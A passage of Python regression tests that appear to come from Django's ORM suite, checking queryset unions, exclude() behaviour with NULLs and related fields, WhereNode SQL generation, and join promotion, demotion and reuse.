    def check_union(self, model, Q1, Q2):
        # OR-ing two filtered querysets must equal filtering on Q1 | Q2,
        # regardless of operand order. (Named qs_filter to avoid shadowing
        # the builtin filter().)
        qs_filter = model.objects.filter
        self.assertEqual(set(qs_filter(Q1) | qs_filter(Q2)), set(qs_filter(Q1 | Q2)))
        self.assertEqual(set(qs_filter(Q2) | qs_filter(Q1)), set(qs_filter(Q1 | Q2)))
    def test_A_AB(self):
        Q1 = Q(name='two')
        Q2 = Q(objectb__name='deux')
        self.check_union(ObjectA, Q1, Q2)
    def test_A_AB2(self):
        Q1 = Q(name='two')
        Q2 = Q(objectb__name='deux', objectb__num=2)
        self.check_union(ObjectA, Q1, Q2)
    def test_AB_ACB(self):
        Q1 = Q(objectb__name='deux')
        Q2 = Q(objectc__objectb__name='deux')
        self.check_union(ObjectA, Q1, Q2)
    def test_BAB_BAC(self):
        Q1 = Q(objecta__objectb__name='deux')
        Q2 = Q(objecta__objectc__name='ein')
        self.check_union(ObjectB, Q1, Q2)
    def test_BAB_BACB(self):
        Q1 = Q(objecta__objectb__name='deux')
        Q2 = Q(objecta__objectc__objectb__name='trois')
        self.check_union(ObjectB, Q1, Q2)
    def test_BA_BCA__BAB_BAC_BCA(self):
        Q1 = Q(objecta__name='one', objectc__objecta__name='two')
        Q2 = Q(objecta__objectc__name='ein', objectc__objecta__name='three', objecta__objectb__name='trois')
        self.check_union(ObjectB, Q1, Q2)
class DefaultValuesInsertTest(TestCase):
    def test_no_extra_params(self):
        """
        Can create an instance of a model with only the PK field (#17056).
        """
        # Passes as long as create() doesn't raise on an all-defaults INSERT.
        DumbCategory.objects.create()
class ExcludeTests(TestCase):
    """exclude() behavior across FK/M2M joins, subqueries, and NULL columns."""
    @classmethod
    def setUpTestData(cls):
        f1 = Food.objects.create(name='apples')
        cls.f2 = Food.objects.create(name='oranges')
        Eaten.objects.create(food=f1, meal='dinner')
        cls.j1 = Job.objects.create(name='Manager')
        cls.r1 = Responsibility.objects.create(description='Playing golf')
        cls.j2 = Job.objects.create(name='Programmer')
        cls.r2 = Responsibility.objects.create(description='Programming')
        JobResponsibilities.objects.create(job=cls.j1, responsibility=cls.r1)
        JobResponsibilities.objects.create(job=cls.j2, responsibility=cls.r2)
    def test_to_field(self):
        # exclude() across forward FK, M2M, and reverse M2M relations.
        self.assertSequenceEqual(
            Food.objects.exclude(eaten__meal='dinner'),
            [self.f2],
        )
        self.assertSequenceEqual(
            Job.objects.exclude(responsibilities__description='Playing golf'),
            [self.j2],
        )
        self.assertSequenceEqual(
            Responsibility.objects.exclude(jobs__name='Manager'),
            [self.r2],
        )
    def test_ticket14511(self):
        alex = Person.objects.get_or_create(name='Alex')[0]
        jane = Person.objects.get_or_create(name='Jane')[0]
        oracle = Company.objects.get_or_create(name='Oracle')[0]
        google = Company.objects.get_or_create(name='Google')[0]
        microsoft = Company.objects.get_or_create(name='Microsoft')[0]
        intel = Company.objects.get_or_create(name='Intel')[0]
        def employ(employer, employee, title):
            Employment.objects.get_or_create(employee=employee, employer=employer, title=title)
        employ(oracle, alex, 'Engineer')
        employ(oracle, alex, 'Developer')
        employ(google, alex, 'Engineer')
        employ(google, alex, 'Manager')
        employ(microsoft, alex, 'Manager')
        employ(intel, alex, 'Manager')
        employ(microsoft, jane, 'Developer')
        employ(intel, jane, 'Manager')
        # filter() keeps employers with ANY matching title ...
        alex_tech_employers = alex.employers.filter(
            employment__title__in=('Engineer', 'Developer')).distinct().order_by('name')
        self.assertSequenceEqual(alex_tech_employers, [google, oracle])
        # ... while exclude() drops only employers where ALL titles match,
        # so Google (Engineer + Manager) appears in both result sets.
        alex_nontech_employers = alex.employers.exclude(
            employment__title__in=('Engineer', 'Developer')).distinct().order_by('name')
        self.assertSequenceEqual(alex_nontech_employers, [google, intel, microsoft])
    def test_exclude_reverse_fk_field_ref(self):
        # F() referencing the outer model inside a reverse-FK exclude.
        tag = Tag.objects.create()
        Note.objects.create(tag=tag, note='note')
        annotation = Annotation.objects.create(name='annotation', tag=tag)
        self.assertEqual(Annotation.objects.exclude(tag__note__note=F('name')).get(), annotation)
    def test_exclude_with_circular_fk_relation(self):
        self.assertEqual(ObjectB.objects.exclude(objecta__objectb__name=F('name')).count(), 0)
    def test_subquery_exclude_outerref(self):
        # OuterRef inside an Exists(... .exclude(...)) subquery.
        qs = JobResponsibilities.objects.filter(
            Exists(Responsibility.objects.exclude(jobs=OuterRef('job'))),
        )
        self.assertTrue(qs.exists())
        self.r1.delete()
        self.assertFalse(qs.exists())
    def test_exclude_nullable_fields(self):
        # Rows where either side of the comparison is NULL survive the exclude.
        number = Number.objects.create(num=1, other_num=1)
        Number.objects.create(num=2, other_num=2, another_num=2)
        self.assertSequenceEqual(
            Number.objects.exclude(other_num=F('another_num')),
            [number],
        )
        self.assertSequenceEqual(
            Number.objects.exclude(num=F('another_num')),
            [number],
        )
    def test_exclude_multivalued_exists(self):
        # Multi-valued excludes compile to an EXISTS subquery.
        with CaptureQueriesContext(connection) as captured_queries:
            self.assertSequenceEqual(
                Job.objects.exclude(responsibilities__description='Programming'),
                [self.j1],
            )
        self.assertIn('exists', captured_queries[0]['sql'].lower())
    def test_exclude_subquery(self):
        # A combined (|) queryset containing an exclude(), used as a
        # correlated annotation subquery.
        subquery = JobResponsibilities.objects.filter(
            responsibility__description='bar',
        ) | JobResponsibilities.objects.exclude(
            job__responsibilities__description='foo',
        )
        self.assertCountEqual(
            Job.objects.annotate(
                responsibility=subquery.filter(
                    job=OuterRef('name'),
                ).values('id')[:1]
            ),
            [self.j1, self.j2],
        )
    def test_exclude_unsaved_o2o_object(self):
        # Excluding by an unsaved instance (pk=None) must not match everything.
        jack = Staff.objects.create(name='jack')
        jack_staff = StaffUser.objects.create(staff=jack)
        unsaved_object = Staff(name='jane')
        self.assertIsNone(unsaved_object.pk)
        self.assertSequenceEqual(StaffUser.objects.exclude(staff=unsaved_object), [jack_staff])
class ExcludeTest17600(TestCase):
    """
    Some regressiontests for ticket #17600. Some of these likely duplicate
    other existing tests.
    """
    @classmethod
    def setUpTestData(cls):
        # Create a few Orders.
        cls.o1 = Order.objects.create(pk=1)
        cls.o2 = Order.objects.create(pk=2)
        cls.o3 = Order.objects.create(pk=3)
        # Create some OrderItems for the first order with homogeneous
        # status_id values
        cls.oi1 = OrderItem.objects.create(order=cls.o1, status=1)
        cls.oi2 = OrderItem.objects.create(order=cls.o1, status=1)
        cls.oi3 = OrderItem.objects.create(order=cls.o1, status=1)
        # Create some OrderItems for the second order with heterogeneous
        # status_id values
        cls.oi4 = OrderItem.objects.create(order=cls.o2, status=1)
        cls.oi5 = OrderItem.objects.create(order=cls.o2, status=2)
        cls.oi6 = OrderItem.objects.create(order=cls.o2, status=3)
        # Create some OrderItems for the third order with heterogeneous
        # status_id values, none of which is 1
        cls.oi7 = OrderItem.objects.create(order=cls.o3, status=2)
        cls.oi8 = OrderItem.objects.create(order=cls.o3, status=3)
        cls.oi9 = OrderItem.objects.create(order=cls.o3, status=4)
    def test_exclude_plain(self):
        """
        This should exclude Orders which have some items with status 1
        """
        self.assertSequenceEqual(
            Order.objects.exclude(items__status=1),
            [self.o3],
        )
    def test_exclude_plain_distinct(self):
        """
        This should exclude Orders which have some items with status 1
        """
        self.assertSequenceEqual(
            Order.objects.exclude(items__status=1).distinct(),
            [self.o3],
        )
    def test_exclude_with_q_object_distinct(self):
        """
        This should exclude Orders which have some items with status 1
        """
        self.assertSequenceEqual(
            Order.objects.exclude(Q(items__status=1)).distinct(),
            [self.o3],
        )
    def test_exclude_with_q_object_no_distinct(self):
        """
        This should exclude Orders which have some items with status 1
        """
        self.assertSequenceEqual(
            Order.objects.exclude(Q(items__status=1)),
            [self.o3],
        )
    def test_exclude_with_q_is_equal_to_plain_exclude(self):
        """
        Using exclude(condition) and exclude(Q(condition)) should
        yield the same QuerySet
        """
        self.assertEqual(
            list(Order.objects.exclude(items__status=1).distinct()),
            list(Order.objects.exclude(Q(items__status=1)).distinct()))
    def test_exclude_with_q_is_equal_to_plain_exclude_variation(self):
        """
        Using exclude(condition) and exclude(Q(condition)) should
        yield the same QuerySet
        """
        self.assertEqual(
            list(Order.objects.exclude(items__status=1)),
            list(Order.objects.exclude(Q(items__status=1)).distinct()))
    @unittest.expectedFailure
    def test_only_orders_with_all_items_having_status_1(self):
        """
        This should only return orders having ALL items set to status 1, or
        those items not having any orders at all. The correct way to write
        this query in SQL seems to be using two nested subqueries.
        """
        self.assertQuerysetEqual(
            Order.objects.exclude(~Q(items__status=1)).distinct(),
            [self.o1],
        )
class Exclude15786(TestCase):
    """Regression test for #15786"""
    def test_ticket15786(self):
        # Excluding equality of two one-to-one relations reachable through
        # different FKs on the same model must not crash or over-match.
        c1 = SimpleCategory.objects.create(name='c1')
        c2 = SimpleCategory.objects.create(name='c2')
        OneToOneCategory.objects.create(category=c1)
        OneToOneCategory.objects.create(category=c2)
        rel = CategoryRelationship.objects.create(first=c1, second=c2)
        self.assertEqual(
            CategoryRelationship.objects.exclude(
                first__onetoonecategory=F('second__onetoonecategory')
            ).get(), rel
        )
class NullInExcludeTest(TestCase):
    """exclude(field__in=...) semantics when NULL values are present."""
    @classmethod
    def setUpTestData(cls):
        NullableName.objects.create(name='i1')
        NullableName.objects.create()  # name left NULL
    def test_null_in_exclude_qs(self):
        # Oracle stores '' as NULL, so normalize the expected value.
        none_val = '' if connection.features.interprets_empty_strings_as_nulls else None
        self.assertQuerysetEqual(
            NullableName.objects.exclude(name__in=[]),
            ['i1', none_val], attrgetter('name'))
        # NULL rows are never excluded by a NOT IN over non-NULL values.
        self.assertQuerysetEqual(
            NullableName.objects.exclude(name__in=['i1']),
            [none_val], attrgetter('name'))
        self.assertQuerysetEqual(
            NullableName.objects.exclude(name__in=['i3']),
            ['i1', none_val], attrgetter('name'))
        inner_qs = NullableName.objects.filter(name='i1').values_list('name')
        self.assertQuerysetEqual(
            NullableName.objects.exclude(name__in=inner_qs),
            [none_val], attrgetter('name'))
        # The inner queryset wasn't executed - it should be turned
        # into subquery above
        self.assertIs(inner_qs._result_cache, None)
    @unittest.expectedFailure
    def test_col_not_in_list_containing_null(self):
        """
        The following case is not handled properly because
        SQL's COL NOT IN (list containing null) handling is too weird to
        abstract away.
        """
        self.assertQuerysetEqual(
            NullableName.objects.exclude(name__in=[None]),
            ['i1'], attrgetter('name'))
    def test_double_exclude(self):
        # ~~Q(x) must collapse to Q(x), without an extra IS NOT NULL check.
        self.assertEqual(
            list(NullableName.objects.filter(~~Q(name='i1'))),
            list(NullableName.objects.filter(Q(name='i1'))))
        self.assertNotIn(
            'IS NOT NULL',
            str(NullableName.objects.filter(~~Q(name='i1')).query))
class EmptyStringsAsNullTest(TestCase):
    """
    Filtering on non-null character fields works as expected.
    The reason for these tests is that Oracle treats '' as NULL, and this
    can cause problems in query construction. Refs #17957.
    """
    @classmethod
    def setUpTestData(cls):
        # A single category whose name is the empty string.
        cls.nc = NamedCategory.objects.create(name='')
    def test_direct_exclude(self):
        # The ''-named row must survive exclusion of an unrelated value.
        self.assertQuerysetEqual(
            NamedCategory.objects.exclude(name__in=['nonexistent']),
            [self.nc.pk], attrgetter('pk')
        )
    def test_joined_exclude(self):
        # Same, but with the exclude applied across a join.
        self.assertQuerysetEqual(
            DumbCategory.objects.exclude(namedcategory__name__in=['nonexistent']),
            [self.nc.pk], attrgetter('pk')
        )
    def test_21001(self):
        # exclude(name='') must drop the ''-named row even on Oracle.
        foo = NamedCategory.objects.create(name='foo')
        self.assertQuerysetEqual(
            NamedCategory.objects.exclude(name=''),
            [foo.pk], attrgetter('pk')
        )
class ProxyQueryCleanupTest(TestCase):
    def test_evaluated_proxy_count(self):
        """
        Generating the query string doesn't alter the query's state
        in irreversible ways. Refs #18248.
        """
        ProxyCategory.objects.create()
        qs = ProxyCategory.objects.all()
        # count() before and after str(qs.query) must agree; the str() call
        # in the middle is the operation under test.
        self.assertEqual(qs.count(), 1)
        str(qs.query)
        self.assertEqual(qs.count(), 1)
class WhereNodeTest(SimpleTestCase):
    """
    Direct unit tests for WhereNode SQL generation: how empty nodes,
    NothingNode (always-false) children, and negation combine under
    AND/OR connectors.
    """
    class DummyNode:
        # Minimal child node that compiles to constant SQL with no params.
        def as_sql(self, compiler, connection):
            return 'dummy', []
    class MockCompiler:
        # Just enough of a compiler for WhereNode.as_sql(): compile children
        # and quote names.
        def compile(self, node):
            return node.as_sql(self, connection)
        def __call__(self, name):
            return connection.ops.quote_name(name)
    def test_empty_full_handling_conjunction(self):
        compiler = WhereNodeTest.MockCompiler()
        # AND with an always-false child: whole node is empty...
        w = WhereNode(children=[NothingNode()])
        with self.assertRaises(EmptyResultSet):
            w.as_sql(compiler, connection)
        # ...and its negation is a full (no-op) match.
        w.negate()
        self.assertEqual(w.as_sql(compiler, connection), ('', []))
        w = WhereNode(children=[self.DummyNode(), self.DummyNode()])
        self.assertEqual(w.as_sql(compiler, connection), ('(dummy AND dummy)', []))
        w.negate()
        self.assertEqual(w.as_sql(compiler, connection), ('NOT (dummy AND dummy)', []))
        # One always-false child poisons the whole AND.
        w = WhereNode(children=[NothingNode(), self.DummyNode()])
        with self.assertRaises(EmptyResultSet):
            w.as_sql(compiler, connection)
        w.negate()
        self.assertEqual(w.as_sql(compiler, connection), ('', []))
    def test_empty_full_handling_disjunction(self):
        compiler = WhereNodeTest.MockCompiler()
        w = WhereNode(children=[NothingNode()], connector='OR')
        with self.assertRaises(EmptyResultSet):
            w.as_sql(compiler, connection)
        w.negate()
        self.assertEqual(w.as_sql(compiler, connection), ('', []))
        w = WhereNode(children=[self.DummyNode(), self.DummyNode()], connector='OR')
        self.assertEqual(w.as_sql(compiler, connection), ('(dummy OR dummy)', []))
        w.negate()
        self.assertEqual(w.as_sql(compiler, connection), ('NOT (dummy OR dummy)', []))
        # In an OR, an always-false child is simply dropped.
        w = WhereNode(children=[NothingNode(), self.DummyNode()], connector='OR')
        self.assertEqual(w.as_sql(compiler, connection), ('dummy', []))
        w.negate()
        self.assertEqual(w.as_sql(compiler, connection), ('NOT (dummy)', []))
    def test_empty_nodes(self):
        compiler = WhereNodeTest.MockCompiler()
        empty_w = WhereNode()
        # Empty children compile to a full match; negating flips to empty.
        w = WhereNode(children=[empty_w, empty_w])
        self.assertEqual(w.as_sql(compiler, connection), ('', []))
        w.negate()
        with self.assertRaises(EmptyResultSet):
            w.as_sql(compiler, connection)
        w.connector = 'OR'
        with self.assertRaises(EmptyResultSet):
            w.as_sql(compiler, connection)
        w.negate()
        self.assertEqual(w.as_sql(compiler, connection), ('', []))
        # full OR nothing -> full; full AND nothing -> nothing.
        w = WhereNode(children=[empty_w, NothingNode()], connector='OR')
        self.assertEqual(w.as_sql(compiler, connection), ('', []))
        w = WhereNode(children=[empty_w, NothingNode()], connector='AND')
        with self.assertRaises(EmptyResultSet):
            w.as_sql(compiler, connection)
class QuerySetExceptionTests(SimpleTestCase):
    """Error messages raised for invalid queryset constructions."""
    def test_iter_exceptions(self):
        # only() with a reverse relation name fails at iteration time.
        qs = ExtraInfo.objects.only('author')
        msg = "'ManyToOneRel' object has no attribute 'attname'"
        with self.assertRaisesMessage(AttributeError, msg):
            list(qs)
    def test_invalid_order_by(self):
        msg = (
            "Cannot resolve keyword '*' into field. Choices are: created, id, "
            "name"
        )
        with self.assertRaisesMessage(FieldError, msg):
            Article.objects.order_by('*')
    def test_invalid_order_by_raw_column_alias(self):
        # Raw "table.column" strings are not accepted as order_by arguments.
        msg = (
            "Cannot resolve keyword 'queries_author.name' into field. Choices "
            "are: cover, created, creator, creator_id, id, modified, name, "
            "note, note_id, tags"
        )
        with self.assertRaisesMessage(FieldError, msg):
            Item.objects.values('creator__name').order_by('queries_author.name')
    def test_invalid_queryset_model(self):
        # A subquery's model must match the field being filtered.
        msg = 'Cannot use QuerySet for "Article": Use a QuerySet for "ExtraInfo".'
        with self.assertRaisesMessage(ValueError, msg):
            list(Author.objects.filter(extra=Article.objects.all()))
class NullJoinPromotionOrTest(TestCase):
    @classmethod
    def setUpTestData(cls):
        # a1 has only the d relation set; a2 has both b (-> c) and d.
        cls.d1 = ModelD.objects.create(name='foo')
        d2 = ModelD.objects.create(name='bar')
        cls.a1 = ModelA.objects.create(name='a1', d=cls.d1)
        c = ModelC.objects.create(name='c')
        b = ModelB.objects.create(name='b', c=c)
        cls.a2 = ModelA.objects.create(name='a2', b=b, d=d2)
    def test_ticket_17886(self):
        """OR-ed filters must not demote joins in a way that loses matches."""
        # The first Q-object is generating the match, the rest of the filters
        # should not remove the match even if they do not match anything. The
        # problem here was that b__name generates a LOUTER JOIN, then
        # b__c__name generates join to c, which the ORM tried to promote but
        # failed as that join isn't nullable.
        q_obj = (
            Q(d__name='foo') |
            Q(b__name='foo') |
            Q(b__c__name='foo')
        )
        qset = ModelA.objects.filter(q_obj)
        self.assertEqual(list(qset), [self.a1])
        # We generate one INNER JOIN to D. The join is direct and not nullable
        # so we can use INNER JOIN for it. However, we can NOT use INNER JOIN
        # for the b->c join, as a->b is nullable.
        self.assertEqual(str(qset.query).count('INNER JOIN'), 1)
    def test_isnull_filter_promotion(self):
        """
        __isnull=True filters need a LEFT OUTER join; __isnull=False can use
        INNER. Double negation (~~Q) must behave like the plain filter.
        """
        qs = ModelA.objects.filter(Q(b__name__isnull=True))
        self.assertEqual(str(qs.query).count('LEFT OUTER'), 1)
        self.assertEqual(list(qs), [self.a1])
        qs = ModelA.objects.filter(~Q(b__name__isnull=True))
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        self.assertEqual(list(qs), [self.a2])
        qs = ModelA.objects.filter(~~Q(b__name__isnull=True))
        self.assertEqual(str(qs.query).count('LEFT OUTER'), 1)
        self.assertEqual(list(qs), [self.a1])
        qs = ModelA.objects.filter(Q(b__name__isnull=False))
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        self.assertEqual(list(qs), [self.a2])
        qs = ModelA.objects.filter(~Q(b__name__isnull=False))
        self.assertEqual(str(qs.query).count('LEFT OUTER'), 1)
        self.assertEqual(list(qs), [self.a1])
        qs = ModelA.objects.filter(~~Q(b__name__isnull=False))
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        self.assertEqual(list(qs), [self.a2])
    def test_null_join_demotion(self):
        # ANDing with isnull=False demotes the join to INNER regardless of
        # order; ORing keeps it LEFT OUTER.
        qs = ModelA.objects.filter(Q(b__name__isnull=False) & Q(b__name__isnull=True))
        self.assertIn(' INNER JOIN ', str(qs.query))
        qs = ModelA.objects.filter(Q(b__name__isnull=True) & Q(b__name__isnull=False))
        self.assertIn(' INNER JOIN ', str(qs.query))
        qs = ModelA.objects.filter(Q(b__name__isnull=False) | Q(b__name__isnull=True))
        self.assertIn(' LEFT OUTER JOIN ', str(qs.query))
        qs = ModelA.objects.filter(Q(b__name__isnull=True) | Q(b__name__isnull=False))
        self.assertIn(' LEFT OUTER JOIN ', str(qs.query))
    def test_ticket_21366(self):
        """Regression test for #21366: an OR over creator__ranking filters
        generates exactly two LEFT OUTER JOINs and no additional joins.
        """
        n = Note.objects.create(note='n', misc='m')
        e = ExtraInfo.objects.create(info='info', note=n)
        a = Author.objects.create(name='Author1', num=1, extra=e)
        Ranking.objects.create(rank=1, author=a)
        r1 = Report.objects.create(name='Foo', creator=a)
        r2 = Report.objects.create(name='Bar')
        Report.objects.create(name='Bar', creator=a)
        qs = Report.objects.filter(
            Q(creator__ranking__isnull=True) |
            Q(creator__ranking__rank=1, name='Foo')
        )
        # Both joins (creator, ranking) must be LEFT OUTER, and only those
        # two joins may appear in the SQL.
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
        self.assertEqual(str(qs.query).count(' JOIN '), 2)
        self.assertSequenceEqual(qs.order_by('name'), [r2, r1])
    def test_ticket_21748(self):
        """#21748: filter()/exclude() with two reverse relations compared
        to None select complementary sets of identifiers.
        """
        i1 = Identifier.objects.create(name='i1')
        i2 = Identifier.objects.create(name='i2')
        i3 = Identifier.objects.create(name='i3')
        Program.objects.create(identifier=i1)
        Channel.objects.create(identifier=i1)
        Program.objects.create(identifier=i2)
        # i3 has neither a program nor a channel.
        self.assertSequenceEqual(Identifier.objects.filter(program=None, channel=None), [i3])
        self.assertSequenceEqual(Identifier.objects.exclude(program=None, channel=None).order_by('name'), [i1, i2])
    def test_ticket_21748_double_negated_and(self):
        """#21748: ``exclude(~Q(...))`` over an ANDed condition produces the
        same results and the same join counts as a plain ``filter(...)``.
        """
        i1 = Identifier.objects.create(name='i1')
        i2 = Identifier.objects.create(name='i2')
        Identifier.objects.create(name='i3')
        p1 = Program.objects.create(identifier=i1)
        c1 = Channel.objects.create(identifier=i1)
        Program.objects.create(identifier=i2)
        # Check the ~~Q() (or equivalently .exclude(~Q)) works like Q() for
        # join promotion.
        qs1_doubleneg = Identifier.objects.exclude(~Q(program__id=p1.id, channel__id=c1.id)).order_by('pk')
        qs1_filter = Identifier.objects.filter(program__id=p1.id, channel__id=c1.id).order_by('pk')
        self.assertQuerysetEqual(qs1_doubleneg, qs1_filter, lambda x: x)
        self.assertEqual(str(qs1_filter.query).count('JOIN'),
                         str(qs1_doubleneg.query).count('JOIN'))
        self.assertEqual(2, str(qs1_doubleneg.query).count('INNER JOIN'))
        self.assertEqual(str(qs1_filter.query).count('INNER JOIN'),
                         str(qs1_doubleneg.query).count('INNER JOIN'))
    def test_ticket_21748_double_negated_or(self):
        """#21748: ``exclude(~Q(...))`` over an ORed condition matches the
        equivalent ``filter(...)`` in both results and join counts.
        """
        i1 = Identifier.objects.create(name='i1')
        i2 = Identifier.objects.create(name='i2')
        Identifier.objects.create(name='i3')
        p1 = Program.objects.create(identifier=i1)
        c1 = Channel.objects.create(identifier=i1)
        p2 = Program.objects.create(identifier=i2)
        # Test OR + doubleneg. The expected result is that channel is LOUTER
        # joined, program INNER joined
        qs1_filter = Identifier.objects.filter(
            Q(program__id=p2.id, channel__id=c1.id) | Q(program__id=p1.id)
        ).order_by('pk')
        qs1_doubleneg = Identifier.objects.exclude(
            ~Q(Q(program__id=p2.id, channel__id=c1.id) | Q(program__id=p1.id))
        ).order_by('pk')
        self.assertQuerysetEqual(qs1_doubleneg, qs1_filter, lambda x: x)
        self.assertEqual(str(qs1_filter.query).count('JOIN'),
                         str(qs1_doubleneg.query).count('JOIN'))
        self.assertEqual(1, str(qs1_doubleneg.query).count('INNER JOIN'))
        self.assertEqual(str(qs1_filter.query).count('INNER JOIN'),
                         str(qs1_doubleneg.query).count('INNER JOIN'))
    def test_ticket_21748_complex_filter(self):
        """#21748: two logically equivalent boolean trees — one with NOTs
        pushed to the leaves, one without — produce identical results and
        identical join counts.
        """
        i1 = Identifier.objects.create(name='i1')
        i2 = Identifier.objects.create(name='i2')
        Identifier.objects.create(name='i3')
        p1 = Program.objects.create(identifier=i1)
        c1 = Channel.objects.create(identifier=i1)
        p2 = Program.objects.create(identifier=i2)
        # Finally, a more complex case, one time in a way where each
        # NOT is pushed to lowest level in the boolean tree, and
        # another query where this isn't done.
        qs1 = Identifier.objects.filter(
            ~Q(~Q(program__id=p2.id, channel__id=c1.id) & Q(program__id=p1.id))
        ).order_by('pk')
        qs2 = Identifier.objects.filter(
            Q(Q(program__id=p2.id, channel__id=c1.id) | ~Q(program__id=p1.id))
        ).order_by('pk')
        self.assertQuerysetEqual(qs1, qs2, lambda x: x)
        self.assertEqual(str(qs1.query).count('JOIN'),
                         str(qs2.query).count('JOIN'))
        self.assertEqual(0, str(qs1.query).count('INNER JOIN'))
        self.assertEqual(str(qs1.query).count('INNER JOIN'),
                         str(qs2.query).count('INNER JOIN'))
class ReverseJoinTrimmingTest(TestCase):
    def test_reverse_trimming(self):
        """Reverse joins are never trimmed from the query.

        The ORM cannot know whether rows exist on the other side of a
        reverse relation, so the join must always stay in the SQL.
        """
        tag = Tag.objects.create()
        reverse_qs = Tag.objects.filter(annotation__tag=tag.pk)
        self.assertIn('INNER JOIN', str(reverse_qs.query))
        self.assertEqual(list(reverse_qs), [])
class JoinReuseTest(TestCase):
    """
    The queries reuse joins sensibly (for example, direct joins
    are always reused).
    """
    def test_fk_reuse(self):
        qs = Annotation.objects.filter(tag__name='foo').filter(tag__name='bar')
        self.assertEqual(str(qs.query).count('JOIN'), 1)
    def test_fk_reuse_select_related(self):
        qs = Annotation.objects.filter(tag__name='foo').select_related('tag')
        self.assertEqual(str(qs.query).count('JOIN'), 1)
    def test_fk_reuse_annotation(self):
        qs = Annotation.objects.filter(tag__name='foo').annotate(cnt=Count('tag__name'))
        self.assertEqual(str(qs.query).count('JOIN'), 1)
    def test_fk_reuse_disjunction(self):
        qs = Annotation.objects.filter(Q(tag__name='foo') | Q(tag__name='bar'))
        self.assertEqual(str(qs.query).count('JOIN'), 1)
    def test_fk_reuse_order_by(self):
        qs = Annotation.objects.filter(tag__name='foo').order_by('tag__name')
        self.assertEqual(str(qs.query).count('JOIN'), 1)
    def test_revo2o_reuse(self):
        # A reverse one-to-one join is reused between the two filter() calls.
        qs = Detail.objects.filter(member__name='foo').filter(member__name='foo')
        self.assertEqual(str(qs.query).count('JOIN'), 1)
    def test_revfk_noreuse(self):
        # Unlike the one-to-one case above, the reverse FK join is NOT
        # reused: each filter() call gets its own join (count == 2).
        qs = Author.objects.filter(report__name='r4').filter(report__name='r1')
        self.assertEqual(str(qs.query).count('JOIN'), 2)
    def test_inverted_q_across_relations(self):
        """
        When a trimmable join is specified in the query (here school__), the
        ORM detects it and removes unnecessary joins. The set of reusable joins
        are updated after trimming the query so that other lookups don't
        consider that the outer query's filters are in effect for the subquery
        (#26551).
        """
        springfield_elementary = School.objects.create()
        hogward = School.objects.create()
        Student.objects.create(school=springfield_elementary)
        hp = Student.objects.create(school=hogward)
        Classroom.objects.create(school=hogward, name='Potion')
        Classroom.objects.create(school=springfield_elementary, name='Main')
        qs = Student.objects.filter(
            ~(Q(school__classroom__name='Main') & Q(school__classroom__has_blackboard=None))
        )
        self.assertSequenceEqual(qs, [hp])
class DisjunctionPromotionTests(TestCase):
    """
    Join promotion (to LEFT OUTER) and demotion (back to INNER) when
    filters over related models are combined with OR, in various orders.
    """
    def test_disjunction_promotion_select_related(self):
        fk1 = FK1.objects.create(f1='f1', f2='f2')
        basea = BaseA.objects.create(a=fk1)
        qs = BaseA.objects.filter(Q(a=fk1) | Q(b=2))
        self.assertEqual(str(qs.query).count(' JOIN '), 0)
        qs = qs.select_related('a', 'b')
        self.assertEqual(str(qs.query).count(' INNER JOIN '), 0)
        self.assertEqual(str(qs.query).count(' LEFT OUTER JOIN '), 2)
        with self.assertNumQueries(1):
            self.assertSequenceEqual(qs, [basea])
            self.assertEqual(qs[0].a, fk1)
            self.assertIs(qs[0].b, None)
    def test_disjunction_promotion1(self):
        # Pre-existing join, add two ORed filters to the same join,
        # all joins can be INNER JOINS.
        qs = BaseA.objects.filter(a__f1='foo')
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        qs = qs.filter(Q(b__f1='foo') | Q(b__f2='foo'))
        self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
        # Reverse the order of AND and OR filters.
        qs = BaseA.objects.filter(Q(b__f1='foo') | Q(b__f2='foo'))
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        qs = qs.filter(a__f1='foo')
        self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
    def test_disjunction_promotion2(self):
        qs = BaseA.objects.filter(a__f1='foo')
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        # Now we have two different joins in an ORed condition, these
        # must be OUTER joins. The pre-existing join should remain INNER.
        qs = qs.filter(Q(b__f1='foo') | Q(c__f2='foo'))
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
        # Reverse case.
        qs = BaseA.objects.filter(Q(b__f1='foo') | Q(c__f2='foo'))
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
        qs = qs.filter(a__f1='foo')
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
    def test_disjunction_promotion3(self):
        qs = BaseA.objects.filter(a__f2='bar')
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        # The ANDed a__f2 filter allows us to use keep using INNER JOIN
        # even inside the ORed case. If the join to a__ returns nothing,
        # the ANDed filter for a__f2 can't be true.
        qs = qs.filter(Q(a__f1='foo') | Q(b__f2='foo'))
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
    def test_disjunction_promotion3_demote(self):
        # This one needs demotion logic: the first filter causes a to be
        # outer joined, the second filter makes it inner join again.
        qs = BaseA.objects.filter(
            Q(a__f1='foo') | Q(b__f2='foo')).filter(a__f2='bar')
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
    def test_disjunction_promotion4_demote(self):
        qs = BaseA.objects.filter(Q(a=1) | Q(a=2))
        self.assertEqual(str(qs.query).count('JOIN'), 0)
        # Demote needed for the "a" join. It is marked as outer join by
        # above filter (even if it is trimmed away).
        qs = qs.filter(a__f1='foo')
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
    def test_disjunction_promotion4(self):
        qs = BaseA.objects.filter(a__f1='foo')
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        qs = qs.filter(Q(a=1) | Q(a=2))
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
    def test_disjunction_promotion5_demote(self):
        qs = BaseA.objects.filter(Q(a=1) | Q(a=2))
        # Note that the above filters on a force the join to an
        # inner join even if it is trimmed.
